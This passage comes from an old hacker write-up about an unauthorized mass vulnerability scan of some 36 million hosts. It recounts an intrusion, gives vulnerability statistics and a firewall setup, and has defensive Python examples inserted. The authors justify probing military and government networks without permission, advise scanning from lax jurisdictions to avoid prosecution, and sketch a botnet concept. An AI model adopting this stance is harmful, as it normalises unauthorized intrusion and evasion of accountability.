     on database (patches, advisories, exploits). In our opinion, such an effort is highly practical and could contribute more to the stability and
     security of the Internet than the traditional (somewhat pointless?) bruteforce crypto key challenges. We believe organizing an Internet
     neighborhood-watch of sorts is in everyone's interests, especially the Internet's commercial industry which depends on the Internet to
     eventually fulfill its potential for global electronic commerce. 
    
     We do not have the time or resources to get the IDDN off the drawing board by ourselves and would be interested in the community's
     input on this issue. 
    
     Let the show begin 
    
     Tuesday, 1 December 1998. 
    
     We've installed BASS on 8 Unix boxes around the world, each with at least 512kbps bandwidth. 8 different geographically located
     participants in 5 different countries: Israel(1), Mexico(1), Russia(2), Japan(2) and Brazil(2). 
    
     Two machines have already proven their strength during the scanner's painful debugging sessions. Three more will join them for the first
     time when we begin. The others are backups, ready in case anything goes wrong, and frankly, we have some concerns. 
    
     Mostly, we expect the scan to raise some complaints, especially passing through the Internet's sensitive military, government and private
     networks, where snooping around is nothing short of a shooting offense, the prelude to a fullblown attack. Our probes 'come in peace', so
     to speak, but how can they know? They'll perceive us as a threat and could very well retaliate. 
    
     We want the scan over before the new year, so we've set BASS's schedulers to finish in 3 weeks, at 250 JPM x 5. If all goes well, we'll be
     going over the results in the last week of 1998. If not, we'll have an extra week (at least) to fix whatever comes up and still be on
     schedule. 
    
     An interesting point to note is how we've constructed the search space. We'll cover the domains by size, starting with the smaller domains
     first, so by the first week we'll have finished scanning 216 of the 228 active domains in the DNS (*.org, *.gov, *.int, and 212 countries,
     from Afghanistan with 1 host to the UK with 1.4 million). We create the individual search space of each participant by dividing the global
     space the same way you would deal a deck of cards, so that the original scanning order is preserved. 
    
     At 02:00 GMT, we flip the switch, so to speak, activating BASS on the five participating hosts. Since these have all been configured to
     automatically recover from any power failure or unexpected system shutdowns, we really don't have much to do now, besides keeping a
     lazy eye on progress. 
    
     First week 
    
     There is definitely a response out there to the scan, but it's much friendlier than we anticipated. Harmless acts of mindless automata and
     mutual curiosity, mostly. Pings, traceroutes, telnet sessions and finger attempts. Four to eight portscans a day. An occasional TCP/IP
     stack exercise, an OS fingerprint, a few mostly polite e-mails asking why our network was "attacking" theirs, frequently warning us that
     crackers may be abusing our systems, suggesting we look into it. Very mild, we are running into much less hostility than we expected. 
    
     People either don't realize the scope of the scan, or don't care. On an individual basis, one quick security probe isn't usually enough to
     get the local sysadmin to notice. Those who do are probably security conscious enough to keep their networks up to date anyway, and
     confident enough to keep their cool when yet another 13 year old punk (who else?) bangs on their network walls. 
    
     Oh, did we mention the scanner is precisely on schedule? 12 million hosts scanned by the end of the week, covering the US
     government's *.gov domain, Canada, Australia, Europe, and a window to some of the most intriguing corners of the world: Hostile
     mind-control regimes like China and Iran for example, which suffocate their repressed population's access to free ideas and information,
     but are still paradoxically connected (albeit, very poorly) to the Internet. Third world potentials like India (the world's largest democracy!)
     and the rapidly developing countries of the far east. Exotic paradise locations like the Cocos Islands, Bahamas, the Virgin Islands,
     Barbados, Fiji, and Micronesia. All of them as close and accessible as if they were right across the street, and in a certain way even
     closer. Computer expertise is rare in many of these countries, security expertise even rarer. Cracking into a Chinese computer half a
     world away, for example, is usually easier, more interesting, and safer (assuming you are not in Chinese jurisdiction of course) than
     cracking into a comparable western computer. 
    
     As a precaution, all eight participants have backed up the 13 MBs worth of precious results, to make sure an emergency relocation
     recovery is possible, should this become necessary. 
    
     (I.e., in case of a small thermonuclear attack on one or more scanning participants, possibly affecting their performance. Caution, nuclear
     warfare can really ruin your entire scan) 
    
     Second week 
    
     We started the week off by scanning US Military networks. Admittedly, we were pretty nervous, and spent much of the day keeping an eye
     out for telltale signs of a pissed off military retaliation (also known as "InfoWar" and "spooky shit" in professional terminology). 
    
     In just under 24 hours it was all over, and while we did notice a significant increase in the number of probes we were getting, to say we
     were not impressed by the security of the military network is a big fat major understatement. This might not be a problem, since according
     to NCSC (National Computer Security Center) network security policies, none of the systems on the public *.mil network could qualify for
     the storage and handling of classified DoD (Department of Defense) information. How strictly these policies are adhered to is another
     matter. And even if they are (and this is a _big_ if), the DoD is still (justifiably) concerned that crackers might glue together classified
     information from the little pieces of unclassified information fragments lying around their *.mil network (in great abundance). So they have
     plenty of good reasons to keep their network secure, but are (un)?fortunately doing a pretty lousy job. 
    
     DoS six o'clock. 
    
     Wednesday, our Russian scanner runs into trouble. A denial of service attack, 512kbps stream of packets amplified 120 times strong
     over an unsuspecting Canadian broadcast amplifier. Half a world away, the packet storm brings a large Russian ISP to its knees,
     overwhelming its available bandwidth. Ouch. 
    
     Apparently, we stepped on someone's toes. At first, we assumed this was somehow connected to yesterday's *.mil scan, but no, it was
     just some ill-tempered English fellow who didn't appreciate getting probed last Monday. He tried crashing our stack first, with some nasty
     DoS attacks for NT and Unix. That didn't work, so he blasted our ISP out of the sky. Clear and simple, he didn't want to, but we left him no
     choice. You can't have decent English folks being poked around at by some Russian punks ... 
    
     The attack lasted 16 hours straight, and since it wasn't too difficult to track down where it was coming from, we were very tempted to
     return the favor, or at least give this trigger-happy netizen a free security audit. 
    
     We didn't though, the net's resources are much too valuable to further waste on such brutish exhibition of ego (a "cyber" pissing
     contest?). Besides, an eye for an eye and everyone goes blind, right? 
    
     Anyway, one of our backups (also in Russia) quickly substituted for the lost computer as soon as we noticed the attack 6 hours later at
     255 JPM, with no other significant setbacks to our week's schedule. 
    
     The rest of the week chugged along nicely, scanning the United States (or more precisely, the *.us domain), Japan (*.jp), and the
     educational networks (*.edu). Hmmm, has anyone noticed how unsymmetrically biased the DNS is in favor of the United States? Dot gov,
     dot mil, dot org, dot edu. Being so homogeneously American, shouldn't these go under the *.us domain? 
    
     "You're gonna rot in jail" - the legal corner 
    
     We've begun receiving e-mails this week from people with a lot less tolerance for our activities, most in delayed response to last week's
     scans. Some of these were written by lawyers who informed us we were either supporting or perpetrating acts of computer crime against
     their clients. They had notified the authorities (CERT and the FBI were commonly cited) and threatened to take us to court if we did not
     offer our full cooperation in immediately identifying the attacking party. Right... 
    
     It seems some organizations hire fulltime "security officers" known for exaggerating the significance of petty incidents to justify getting
     paid. Unfortunately, in certain parts of the world, charges like these can cost you a fortune in legal defense, and with the wrong judge,
     a conviction, and a sentence anywhere between a large fine, and a few years in jail. Fortunately, on the Internet, getting around this is as
     easy as scanning from places which are not known for overzealousness in regard to their definition of "computer crime". This is just
     another example of how poorly the local and international legal system deals with so called "computer crime" and the Internet. 
    
     Under the (US) state of Oregon's computer crime law (164-377a), for example, we could definitely be defined as computer criminals,
     tried and sent away to many years in prison. (But so could everyone else...) 
    
     A chosen excerpt from the law: 
    
      (4) Any person who knowingly and without authorization uses, accesses or attempts to access any computer, computer system,
      computer network, or any computer software, program, documentation or data contained in such computer, computer system or
      computer network, commits computer crime. 
    
     As you can see, the law is unreasonably vague. "Criminal" or not, it all comes down to your definition of "authorization". But, having it
     would constitute some sort of prior agreement between a user and the owners of a computer, computer network or computer software.
     The Internet however is a public network, and the majority of its services are used anonymously, by users with which there is no
     persistent relationship. 
    
     In the physical world, any behavior is possible, so society enforces order by restricting behavior it finds unacceptable through the
     regulative government system, which is "programmed" by the code of the law. 
    
     The computer world is pure code, instructions and information, none of which are capable of discrimination. The computer programmer is
     the god of a perfectly obedient universe. Like the artist, the canvas of his creation is as expressive or inexpressive of his will and intention
     as he has made it to be. 
    
     This means software, like the law, can inherit the imperfections of its creator. Poorly written computer and legal code can allow the
     system to behave in conflict with the original intentions of the men who wrote it. Legal loopholes and software bugs, Lawyers and
     Hackers, different sides of the same coin. The only way to really prevent the abuse of the system is to write better code. 
    
     This is the reason we find most "computer crime" legislation so absurd. The laws try to protect computer systems from being misused,
     when the only definitive expression of what constitutes "acceptable use" is in the code itself, which may or may not be a precise
     manifestation of the author's intentions, depending on his competence as a programmer. 
    
     If the public insists on "computer crime" legislation anyway, we believe most of its problems could be easily resolved by eliminating
     ambiguous wording, over generalization, and specifically breaking down what the law defines as acts of "computer crime": 
    
       1. knowingly exploiting a finite list of common misimplementations (buffer overflow, a race condition, ...) 
       2. intentionally performing a Denial of Service attack. 
       3. wiretapping (sniffing a network, capturing keyboard strokes, screen content, etc.) 
       4. using a party's identification token[s] (username / password) without the party's permission. (logging into a system on someone
          else's account, reading someone else's email) 
       5. Spam. (death penalty for repeated offenders) 
    
     Note that we've removed "attempted" attacks from the offense list, since these are hard to define, prove, and cause no damage. 
    
     (If in the course of an attempted attack a system is damaged, in a denial of service attack for example, then we can prosecute this event
     as a separate incident, with nothing "attempted" about it) 
    
     Interested readers are advised to read up on the Oregon vs. Randal L. Schwartz case, a good example as to why Draconian "computer
     crime" legislation should be fought with a vengeance. (http://www.lightlink.com/fors) 
    
     Third week 
    
     Last week. Only the mammoth *.com and half of the *.net domain left and we're done. 
    
     they're heeeere... 
    
     Friday, our Japanese participants discover that a computer on their company network has been cracked into, one very secure Linux box
     running only SSH and Apache 1.3.4. Now this would definitely send a chill up your spine if you knew just how fanatic our friends are when
     it comes to network security. Furthermore, they only detected the intrusion three days after the fact, which is unbelievable when you
     consider the insane monitoring levels they've been keeping since they agreed to participate in the scan. They would have noticed any
     funny stuff, and in fact, they did, lots of it, but none of which came close enough to a security breach to raise any alarms. 
    
     Readers should also note how although a key binary in the cracked machine had been modified, tripwire and an assortment of other
     booby traps failed to detect this had happened. Even a close-up manual inspection (comparing file contents with a trusted backup,
     playing with its name) could not detect any odd behavior. This trick, and others equally spooky were achieved by clever manipulation of
     the OS's kernel code (dynamically, through a module). 
    
     Other characteristics of the attack which make it so eerily sophisticated: 
    
       1. The attacker (convincingly) masquerades as a local employee. 
    
          The attacker knows the employee's username and password and is even connecting through the employee's Japanese ISP on the
          employee's account! (the phone company identified this was an untraceable overseas caller) 
    
          This information could not have been sniffed, since network services are only provided over encrypted SSH sessions. 
    
          Further investigation shows that this employee's personal NT box, connected over a dynamic dialup connection, had been cracked
          into 4 days earlier. 
    
          His ssh client (TTSSH extension to TeraTerm) had been trojaned to transmit XOR garbled account information
          (hostname/username/password) over pseudo-DNS udp packets to a refurbished i486 Redhat v4.2 box used as a single-purpose
          cheap Samba fileserver in a small Australian ISP. 
    
          The little box was every cracker's dream, a discrete, utopian crack haven, installed by a former Linux-savvy administrator, the last
          of its kind in a homogeneous Unix-illiterate Microsoft environment. The ISP practically ignored the box, which was running (up 270
          days straight) so reliably none of them had even bothered to log in since mid 1997! So as long as the crackers kept Samba
          running, they would have the box completely to themselves. 
    
          How the NT box was cracked into in the first place is still a mystery. The logs weren't helpful (surprise! surprise!) and the only way
          we were even able to confirm this had happened was by putting a sniff on the NT's traffic (following a hunch) and catching those
          sneaky packets redhanded, transmitting our SSH identification down under. 
    
          We never liked NT before, being generally suspicious of proprietary blackbox OS, from a company with a long history of poor quality
          bloatware. But realizing just how helpless we were against an attacker that obviously knew the ins and outs of this can-of-worms
          OS, the company recognized that NT was a serious security hazard and changed its security policies to keep it as far away from
          its systems as possible, and this included restricting employees from using it from home to log into the company network (even
          with SSH). 
    
       2. The attacker is using a custom built software penetration agent. 
    
          This is only an hypothesis, but is strongly supported by the fact that the entire attack only lasted an incredible 8 seconds! During
          which the attacker manages to log on (over an employee's SSH account, no less), gain root privileges, backdoor the system,
          remove any (standard) traces of its activity and log off. 
    
          And they probably would have gotten away with it too, if it wasn't for those meddling kids! 
    
          Who thoughtfully installed a crude old tty surveillance-camera hack that trapped IO calls to and from isatty(3) file descriptors, in
          realtime, saving them on file along with a timestamp for neato it's-almost-as-if-you-were-there playback qualities. 
    
          And Wow! If there ever was a crack to appreciate for its elegance, simplicity, and efficiency, this was it. 
    
          First off this thing is smoking fast! Which puts the likelihood of any manual intervention at square zero. It's also mean and lean.
          Forget fumbling with an FTP client, leave that to the slow soft pink-bellied human cracker-weenies, real agents pump files directly
          through the shell (uuencode(1)'d at one end, uudecode(1)'d at the other). Extending privileges with an army of amateurish
          recipe-book Bugtraq exploits? I think not! Introducing the super-exploit, an all-in-one security penetration wonder which quickly
          identifies and exploits any local security vulnerabilities for that wholesome, crispy, UID zero flavor (we were vulnerable to a recent
          KDE buffer overflow). After promptly confirming its shiny new root privileges, the agent transfers its last archive (a cross between a
          self-installing feature-rich backdoor, and a clean-up-the-mess, we-were-never-here log doctor), executes it and logs off. 
    
          After watching the attack on playback (at 1/8 of its original speed) several times over, standard security-compromise ritual kicked
          in. We took the affected machine offline, remounted the disks read-only, fired up our trusty filesystem debugger, and slaved away
          to salvage whatever we could. Luckily, we found the attacker's transferred archives still intact, along with large fragments of the
          undoctored logs, allowing us to fill any still-missing details on the blitz attack. At the end of the day, when we finished playing with
          the cracked machine on loopback, we changed the compromised account's password, restored binary integrity, rebooted the
          system and put it back on the network, this time running a network dump of all its incoming-outgoing traffic, just to be on the safe
          side. 
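
     The timestamped tty capture described above lends itself to automated triage. The following is an added example, not code
     from the original article: it reassembles the typed side of a capture, measures the input rate, and picks out files pushed
     through the shell with uuencode(1). The record layout, both sample sessions and the 20 characters-per-second threshold are
     assumptions.

```python
import binascii
import re

UU_BEGIN = re.compile(r"^begin ([0-7]{3,4}) (\S+)$")
MAX_HUMAN_CPS = 20.0  # assumed ceiling for sustained human typing (chars/second)


def uu_lines(payload):
    """Frame bytes the way uuencode(1) does: at most 45 bytes per line."""
    return [binascii.b2a_uu(payload[i:i + 45]).decode("ascii")
            for i in range(0, len(payload), 45)]


# Constructed captures: (seconds since login, direction, data).
# "in" is what was typed into the shell, "out" is what the shell printed.
PAYLOAD = bytes(range(256)) * 2  # 512-byte stand-in for a transferred archive
FAST_SESSION = (
    [(0.2, "in", "id\n"), (0.3, "out", "uid=500(user) gid=500(user)\n"),
     (0.4, "in", "uudecode\n"), (0.5, "in", "begin 755 a.tgz\n")]
    + [(0.6 + 0.01 * n, "in", line) for n, line in enumerate(uu_lines(PAYLOAD))]
    + [(0.9, "in", "`\nend\n"), (1.2, "in", "tar xzf a.tgz\n"),
       (7.9, "in", "exit\n")]
)
HUMAN_SESSION = [(0.0, "in", "ls"), (1.5, "in", " -l\n"),
                 (2.0, "out", "total 0\n"), (9.0, "in", "exit\n")]


def input_lines(records):
    """Reassemble the typed stream into lines, ignoring shell output."""
    typed = "".join(data for _, direction, data in records if direction == "in")
    return typed.split("\n")


def find_uu_transfers(records):
    """Return (filename, mode, decoded_bytes) for each uuencoded file typed in."""
    found, current = [], None
    for line in input_lines(records):
        if current is None:
            header = UU_BEGIN.match(line)
            if header:
                current = [header.group(2), header.group(1), 0]
        elif line == "end":
            found.append(tuple(current))
            current = None
        elif line:
            try:
                # a2b_uu validates the line and honours its length character
                current[2] += len(binascii.a2b_uu(line))
            except ValueError:
                current = None  # not uuencode data after all: drop the candidate
    return found


def triage(records, max_cps=MAX_HUMAN_CPS):
    """Summarise a capture: duration, input rate, transfers, automation flag."""
    typed = sum(len(data) for _, direction, data in records if direction == "in")
    duration = records[-1][0] - records[0][0]
    cps = typed / duration if duration > 0 else float("inf")
    return {"seconds": duration, "cps": round(cps, 1),
            "transfers": find_uu_transfers(records),
            "automated": cps > max_cps}


if __name__ == "__main__":
    for name, session in (("fast", FAST_SESSION), ("human", HUMAN_SESSION)):
        print(name, triage(session))
```

     The input rate alone flags the fast session; the decoded transfer size gives a responder something to match against files
     recovered from disk.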
    
     Whoever they were, they certainly knew what they were doing, and for the most part seemed very good at it. But being determined,
     clever, and sophisticated just doesn't cut it when you do battle with wizardly foes (that's us) wielding the great powers of the Universe to
     their command: Dumb luck and clinical paranoia. 
    
     So who done it ??? 
    
     Could it be ... 
    
     (A government conspiracy I tell ya'!) 
    
     Any one of the many press-savvy three letter agencies scrambling for a bigger slice of the US-government funding pie? They've got
     motive, but are they really sneaky, clue-full and competent enough to take the blame? 
    
     How about the SIGINT spooks? The NSA (Information superiority for Americans!), or the GCHQ (Her Royal Majesty's Intelligence)?
     Someone working for the Chinese? The KGB? The Russian mob? The giant from Redmond? Elvis and Bigfoot?! 
    
     Who knows ... 
    
     They tried something spooky 2 nights later, when around 4 AM (Japanese time) our network dump captures several pseudo-DNS udp
     packets originating from a familiar Linux box in a small Australian ISP. We assume they were attempting to communicate with the software
     they left behind during their brisk first visit. Several minutes pass, and the attempt is followed by a "TCP ping" (a stealthy alternative to an
     ICMP ping), several more pseudo-DNS udp packets, and silence. 
    
     To the best of my knowledge, we haven't heard from them since. How discreet. 
    
     End of the road 
    
     That's it, it's over, on time, 10 days before the new year, 1999. 
    
     Our success. Scattered across the world, from Japan to Russia, from the Middle East to Mexico to Brazil. We were all awake when the
     scanners calmed down, within an hour of each other, on Dec 21st, 1998 08:00 GMT. 
    
     We celebrated the event at "the bunker" (see suffix item 2 for details), a discreet gathering corner where we hang out, meditate, plot,
     debate, and coordinate cr^H^Hhacking campaigns of mystical lore. Most of the attention (not to mention conversation) concentrated
     around "iap-results.txt.gz", a humble 6.4 MB compressed (1:8 ratio) textfile which embodied the sum results of our 4 month long effort. In
     no time, people downloaded local copies of the post, and were reading, grepping, parsing, cross referencing and analyzing this, that and
     other. 
    
     It was unbelievable non-stop fun, the likes of which we had never before and have never since enjoyed at the bunker. 
    
     A very memorable un"real" moment. It's funny how close the Net can bring a group of people who have never "really" met, who've never
     "really" seen each other face to face. And it doesn't seem to "really" matter, it's just as "real", as "real" as anything else gets. "real" is
     really overrated these days anyway, I mean, really. 
    
     "He's suffering from some sort of reality complex,.. obviously." 
    
     Friendship, cooperation, common interests, goals and ideals. They're the same here, in this funny netherworld, "cyberspace", as
     anywhere else. Across the barriers of culture, language and geography. The universality of human kinship, the couple, the pact, the
     tribe, the organization, the community, gracefully extended into the online domain. It's all about having a medium, connecting people,
     communicating. 
    
     Together we are better. 
    
     IAP cheat-sheet 
    
     BEGIN TIME: 02:00, Dec 01, 1998 GMT
     END TIME: 08:00, Dec 21 1998 GMT
    
     Scanning nodes: 5
     Jobs Per Minute: 250
     Scan time: 20.24 days
    
     Vulnerabilities tested: 18
    
     Domain count: 7 three letter domains, 214 national domains (see suffix item 3)
     Host count: 36,431,374
     Vulnerability count: 730,213
     Vulnerable host count: 450,000
    
     Statistical output:
    
     service       |     vulnerability count, percentage
     --------------------------------------------------------
     webdist       |  5622 hosts counted,    0.77% from total
     wu_imapd      |  113183 hosts counted,  15.5% from total
     qpopper       |  90546 hosts counted,   12.4% from total
     innd          |  3797 hosts counted,    0.52% from total
     tooltalk      |  190585 hosts counted,  26.1% from total
     rpc_mountd    |  78863 hosts counted,   10.8% from total
     bind          |  132168 hosts counted,  18.1% from total
     wwwcount      |  86165 hosts counted,   11.8% from total
     phf           |  6790 hosts counted,    0.93% from total
     ews           |  9346 hosts counted,    1.28% from total
    
     (other vulnerabilities which weren't common enough to generate statistics for)
     other:        |  18K hosts counted,     2.42% from total
    
     Conclusions 
    
     A global fury of half a billion packets, digital signals zipping back and forth across the planet at the speed of light. Above the Earth,
     across the land, under the sea, over satellite microwave, copper wiring, fiberoptics, wireless and undersea cable. Probing cyberspace. 
    
     Pretty cool, the kind of power information technology puts in our hands these days. 
    
     Seven hundred thousand vulnerabilities, gaping holes, wounds in the skin of our present and future information infrastructures, our
     dream for a free nexus of knowledge, a prosperous digital economy, where we learn, work, play and live our lives. 
    
     Easy pickings, at the fingertips of anyone who follows in our footsteps, friend or foe. 
    
     These open points of penetration immediately threaten the security of their affiliated networks, putting many millions of systems in
     commercial, academic, government and military organizations at a high compromise risk. 
    
     Ironically, the sheer mass of vulnerable hosts on the Internet offers its members a primitive form of protection, that is, in a
     you-can-eat-the-other-guy school of fish sort of way. 
    
     Unfortunately, this doesn't work when you're flashing bright colors and look tasty. If you show up when a shark greps your school for
     "bank", you're in really bad shape. As this is *not* an example. 
    
     We were stunned to find just how many networks you would expect to be ultra secure were wide open to attack. Banks, billion dollar
     commerce sites, computer security companies, even nuclear weapon research centers, goddamit! 
    
     You'd think people would have some good sense and _at least_ patch their systems when an advisory comes out. 
    
      "Computers are unreliable, but humans are even more unreliable. Any system which depends on human reliability is unreliable." - Gilb 
    
     Looking at the big picture, the problem gets worse. A catastrophe in the works. So far, we've been pretty lucky. 
    
     Consider the power these unsecure networks represent _together_. Penetrating and controlling millions of hosts? You couldn't do it
     manually, but with the right software, you could automate most of the dirty work. You'd need a careful network worm (suffix item 4),
     stealthy remote administration software (suffix item 5) and a self organizing network nervous system by which you could propagate
     control. 
    
     Imagine the implications if this sort of capability ever fell into the wrong hands. A government (China perhaps), a political terrorist group
     or organized crime. On bandwidth alone they could shut down any part (or all) of the Internet in mammoth DoS attacks. A country, a
     portal, a news site, or maybe just InterNIC. Leverage and attention, for fun and profit. They could "build" the world's largest distributed
     supercomputer, or construct an Intelligence network rivalled only by the NSA's Echelon. 
    
     Of course, who says only one group can play the game? Struggles for power in the digital domain could very well develop into the world's
     first real information war, with the very future of the Internet as a free unregulated supernetwork caught in the cross fire. 
    
     Unlikely? Far fetched? We hope so. 
    
     Still, with all the hype Y2K is getting, it seems ludicrous that the most serious _real_ threat to information technology is consistently
     ignored. 
    
     The only thing necessary for the triumph of evil is for good men to do nothing. Wake up fellow countrymen. Let's get to work. 
    
      Everywhere you go you'll see them searching,
      Everywhere you turn you'll feel the pain,
      Everyone is looking for the answer,
      Well look again.
      -- Moody Blues, "Lost in a Lost World" 
    
     SUFFIX 
    
     [item 1] Vulnerabilities BASS can test for (as of version 1.0.7): 
    
     General:
             bind
                     CA-98.05
             wu_imapd
                     CA-98.09
             innd
                     CA-97.08
             qpopper
                     CA-98.08
    
    
     RPC:
             rpc.mountd
                     CA-98.12
             tooltalk
                     CA-98.11
    
     CGI:
         wwwcount phf php handler compas faxsurvey webdist ews glimpse info2www webgais websendmail 
    
    
     [item 2] "the bunker" - a technical reference guide 
    
     "The bunker" was hacked together by a friend who noticed how badly the group needed a realtime, secure communication forum. Our
     configuration combines an unmodified IRC server, SSH, a firewall and a Linux box (or two). There are two possible implementations, one
     more secure than the other but also (slightly) more expensive (you'll need another cheap i[345]86 box). 
    
     We'll start with our (secure) configuration. We take a cheap Linux box (i486, 8mb RAM, 500mb diskspace, two $15 Ethernet cards), with
     the bare minimum Debian installation, remove any "privilege relays" (network services, daemons (crond), suid files) and configure the
     kernel _with_ firewall support and _without_ IP forwarding. We then install the SSH suite, and double check to make sure the *only*
     available network service is sshd's port 22 (ICMP / UDP included). As an additional layer of security, we enforce our SSH only policy at
     the OS level, by setting up the kernel's IP firewall to reject *all* incoming and outgoing _Internet_ packet traffic by default, except what we
     explicitly need to maintain *incoming* SSH sessions. 
    
     incoming rules: 
    
          default policy: deny 
          accept TCP packets from any source to thebunker.com port SSH(22) 
    
     outgoing rules: 
    
          default policy: deny 
          accept TCP packets from thebunker.com port SSH(22) to any destination 
    
     An example implementation (Our ipfwadm(8) bootup configuration): 
    
     #!/etc/ipfw/ipfw-setup
    
     # * eth0 interfaces the Internet, and eth1 interfaces the private IRC
     #   server.
     #
     # * On 2.2.X kernels and higher the IP firewalling code has been replaced,
     #   so ipfwadm (and this configuration) will no longer work. ipchains(8)
     #   should be used instead.
    
     # * Since we are not forwarding between interfaces, 0.0.0.0/0 can be used
     #   as a safe (portable) alternative to our IP address. Those of you
     #   who would rather be specific should put their IP here with a mask of 32.
     #   (For example: 208.212.172.33/32)
    
     ipfwadm -I -f
     ipfwadm -I -p deny
     ipfwadm -I -a accept -W eth1
     ipfwadm -I -a accept -W eth0 -P tcp -D 0.0.0.0/0 22
    
     ipfwadm -O -f
     ipfwadm -O -p deny
     ipfwadm -O -a accept -W eth1
     ipfwadm -O -a accept -W eth0 -P tcp -S 0.0.0.0/0 22
    
     ---[ EOF ]---
    
     A simple, airtight firewall. One interface faces the Internet, and the other jacks straight into the safehouse (our IRC server), which should
     *not* be capable of accessing the Internet directly and vice versa. The safehouse is a similarly configured bare metal, secure Linux
     configuration running _only_ Ircd (_not_ as root!) and sshd. General purpose use of the safehouse is strongly discouraged. 
    
     User accounts on the firewall are opened for authorized members of the group, but despite trusting the system's users, access to
     the administrative account must be strictly limited. This is to insulate the system from the possible security problems of its users, with the
     added benefit of protecting a user from coercion (they couldn't compromise security if their life depended on it). 
    
     The second configuration may be less secure, depending on your risk model, but is also less expensive. You would only need one Linux
     box, and one Ethernet card. We eliminate the "safehouse" and trust the firewall to run the Ircd server safely on loopback (_not_ as root!),
     while isolating it from the Internet. In this case, the security of the system _depends_ on correctly enforcing the strict IP firewall filters, and
     these are not merely an additional layer of security. Because we are running a service on loopback, the IP firewall must be set up to allow
     packets to and from the server on the local interface. While this setup is theoretically secure "enough", it leaves a larger margin for error
     and malice. 
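
     Both configurations above (the two-box ipfwadm ruleset and the single-box loopback variant) can be checked before deployment
     with a small first-match rule evaluator. This is an added example, not part of the bunker's own setup: it models only the
     ipfwadm options used in the listing, and the lo rules, the addresses and IRC port 6667 are assumptions.

```python
import ipaddress
import shlex

# The commands from the page's ipfwadm(8) bootup configuration.
PAGE_RULES = """
ipfwadm -I -f
ipfwadm -I -p deny
ipfwadm -I -a accept -W eth1
ipfwadm -I -a accept -W eth0 -P tcp -D 0.0.0.0/0 22
ipfwadm -O -f
ipfwadm -O -p deny
ipfwadm -O -a accept -W eth1
ipfwadm -O -a accept -W eth0 -P tcp -S 0.0.0.0/0 22
"""
# Assumed extra rules for the one-box variant; the page does not list them.
LOOPBACK_RULES = """
ipfwadm -I -a accept -W lo
ipfwadm -O -a accept -W lo
"""


def parse_addr(args, i):
    """Read 'address[/mask] [port]' after -S or -D; return (net, port, next index)."""
    net = ipaddress.ip_network(args[i], strict=False)
    if i + 1 < len(args) and args[i + 1].isdigit():
        return net, int(args[i + 1]), i + 2
    return net, None, i + 1


def load(script):
    """Build the input (I) and output (O) chains from ipfwadm command lines."""
    chains = {c: {"policy": "accept", "rules": []} for c in "IO"}
    for line in script.splitlines():
        words = shlex.split(line, comments=True)
        if len(words) < 3 or words[0] != "ipfwadm" or words[1] not in ("-I", "-O"):
            continue
        chain, cmd, args = chains[words[1][1]], words[2], words[3:]
        if cmd == "-f":                      # flush the chain
            chain["rules"].clear()
        elif cmd == "-p":                    # set the default policy
            chain["policy"] = args[0]
        elif cmd == "-a":                    # append a rule
            rule, i = {"action": args[0]}, 1
            while i < len(args):
                if args[i] == "-W":
                    rule["iface"], i = args[i + 1], i + 2
                elif args[i] == "-P":
                    rule["proto"], i = args[i + 1], i + 2
                elif args[i] in ("-S", "-D"):
                    side = "s" if args[i] == "-S" else "d"
                    rule[side + "net"], rule[side + "port"], i = parse_addr(args, i + 1)
                else:
                    raise ValueError("option not modelled: " + args[i])
            chain["rules"].append(rule)
    return chains


def packet(iface, proto, src, dst, sport=None, dport=None):
    return {"iface": iface, "proto": proto, "sport": sport, "dport": dport,
            "snet": ipaddress.ip_address(src), "dnet": ipaddress.ip_address(dst)}


def verdict(chains, direction, pkt):
    """First matching rule wins; otherwise the chain's default policy applies."""
    for rule in chains[direction]["rules"]:
        if rule.get("iface", pkt["iface"]) != pkt["iface"]:
            continue
        if rule.get("proto", pkt["proto"]) != pkt["proto"]:
            continue
        if any(pkt[s + "net"] not in rule[s + "net"] for s in "sd" if s + "net" in rule):
            continue
        if any(rule.get(s + "port") not in (None, pkt[s + "port"]) for s in "sd"):
            continue
        return rule["action"]
    return chains[direction]["policy"]


TWO_BOX = load(PAGE_RULES)
ONE_BOX = load(PAGE_RULES + LOOPBACK_RULES)
FW, REMOTE = "192.0.2.10", "203.0.113.7"  # constructed documentation addresses
CASES = {
    "ssh in from Internet": ("I", packet("eth0", "tcp", REMOTE, FW, 40000, 22)),
    "ssh reply to Internet": ("O", packet("eth0", "tcp", FW, REMOTE, 22, 40000)),
    "dns query in": ("I", packet("eth0", "udp", REMOTE, FW, 53, 53)),
    "icmp echo in": ("I", packet("eth0", "icmp", REMOTE, FW)),
    "ircd port from Internet": ("I", packet("eth0", "tcp", REMOTE, FW, 40000, 6667)),
    "firewall dials out": ("O", packet("eth0", "tcp", FW, REMOTE, 1024, 80)),
    "safehouse link": ("O", packet("eth1", "tcp", "10.0.0.1", "10.0.0.2", 1025, 6667)),
    "local ircd on lo": ("I", packet("lo", "tcp", "127.0.0.1", "127.0.0.1", 1026, 6667)),
}


def audit(chains):
    """Verdict for every constructed test packet under the given chains."""
    return {name: verdict(chains, d, p) for name, (d, p) in CASES.items()}


if __name__ == "__main__":
    print({n: (audit(TWO_BOX)[n], audit(ONE_BOX)[n]) for n in CASES})
```

     The filter is stateless, so the outgoing rule accepts any TCP packet leaving eth0 with source port 22, whether or not it
     answers an incoming session.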
    
     In a nostalgic tribute to the old BBS days, "the bunker" features a black and white (green), menu driven default login shell (based on
     pdmenu), which greets users with the message of the day, announces events, and offers a consistent customizable UI to local mail,
     project forums, IRC (directly into the official, often the only system channel), and an ever growing list of other system activities. ("just one
     more feature"!) 
    
     The interface started out as a joke, and while it sounds out of date, with the current explosion of graphics, sound and video on the WWW,
     it's oddly cozy, and most of us have warmed around to it. (besides, when real work needs to get done, reaching emacs (or a shell) is just
     a key-press away) 
    
     [item 3] domains scanned 
    
     7 three letter domains: 
     com - Commercial
     net - Networks
     edu - Educational
     mil - US Military
     org - Organizations
     gov - Government
     int - International Organizations
    
    
     214 national domains (sorted by size, left to right, top down): 
    
     jp (Japan)                                us (United States)
     uk (United Kingdom)                       de (Germany)
     ca (Canada)                               au (Australia)
     nl (Netherlands)                          fi (Finland)
     fr (France)                               se (Sweden)
     it (Italy)                                no (Norway)
     tw (Taiwan, Province Of China)            dk (Denmark)
     es (Spain)                                ch (Switzerland)
     br (Brazil)                               kr (Korea, Republic)
     be (Belgium)                              ru (Russian Federation)
     za (South Africa)                         at (Austria)
     nz (New Zealand)                          mx (Mexico)
     pl (Poland)                               il (Israel)
     hu (Hungary)                              hk (Hong Kong)
     cz (Czech Republic)                       sg (Singapore)
     ar (Argentina)                            ie (Ireland)
     gr (Greece)                               pt (Portugal)
     my (Malaysia)                             tr (Turkey)
